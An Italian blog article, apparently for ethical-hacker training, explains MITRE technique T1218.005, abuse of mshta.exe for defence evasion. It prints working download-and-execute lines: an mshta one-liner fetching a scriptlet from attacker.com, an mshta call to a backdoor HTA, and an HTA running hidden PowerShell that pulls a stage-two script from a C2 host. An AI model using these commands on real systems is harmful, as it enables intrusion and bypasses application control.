Esecuzione tramite Mshta: Signed Binary Proxy Execution: Mshta (T1218.005)

La tecnica sfrutta mshta.exe, un'utilità Microsoft legittima progettata per eseguire HTML Applications (HTA), trasformandola in un veicolo per l'esecuzione di codice malevolo. Questo binario firmato diventa un proxy perfetto per aggirare i controlli di sicurezza, eseguendo JavaScript e VBScript al di fuori del contesto di sicurezza di Internet Explorer.

Classificata nella tattica TA0005 (Defense Evasion), questa tecnica permette agli attaccanti di mascherare le loro attività dietro un processo trusted di Windows. La versatilità dell'approccio emerge dai numeri: 17 gruppi APT l'hanno integrata nel loro arsenale, supportata da 11 famiglie di malware e documentata in 2 campagne maggiori.

L'eleganza dell'attacco risiede nella sua semplicità: una singola riga di comando può scaricare ed eseguire payload remoti, bypassando completamente le policy di sicurezza del browser e molte soluzioni di application control tradizionali.

Per testare efficacemente questa tecnica nel tuo lab, inizia con l'esecuzione diretta di script inline. Il comando base utilizza VBScript per recuperare payload remoti:

mshta vbscript:Close(Execute("GetObject(""script:https://attacker.com/payload.sct"")"))

Questa sintassi permette l'esecuzione immediata di scriptlet remoti senza salvare file su disco. Per scenari più complessi, puoi ospitare file HTA completi e richiamarli direttamente:

mshta http://testserver.local/backdoor.hta

La potenza di mshta emerge quando lo combini con altre tecniche. APT29 ha dimostrato come concatenare mshta con PowerShell per download multi-stage. Crea un HTA che scarica ed esegue ulteriori payload:

<script language="VBScript">
    Set shell = CreateObject("WScript.Shell")
    shell.Run "powershell -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://c2.local/stage2.ps1')"
    self.close
</script>

Per simulare tecniche più sofisticate come quelle di FIN7, incorpora l'offuscazione JavaScript. Strumenti come Koadic forniscono moduli pronti per generare stager HTA con encoding Base64 e routine anti-VM integrate.

Durante i test, monitora come mshta.exe bypassa AppLocker configurato in modalità permissiva. Noterai che l'esecuzione avviene nel contesto di un processo firmato Microsoft, rendendo inefficaci molte whitelist basate su publisher.

Vuoi diventare un Ethical Hacker ma non sai da dove iniziare?

Scarica la guida gratuita e segui il percorso corretto fin dal primo passo

We use cookies

Utilizziamo i cookie sul nostro sito Web. Alcuni di essi sono essenziali per il funzionamento del sito, mentre altri ci aiutano a migliorare questo sito e l'esperienza dell'utente (cookie di tracciamento). Puoi decidere tu stesso se consentire o meno i cookie. Ti preghiamo di notare che se li rifiuti, potresti non essere in grado di utilizzare tutte le funzionalità del sito.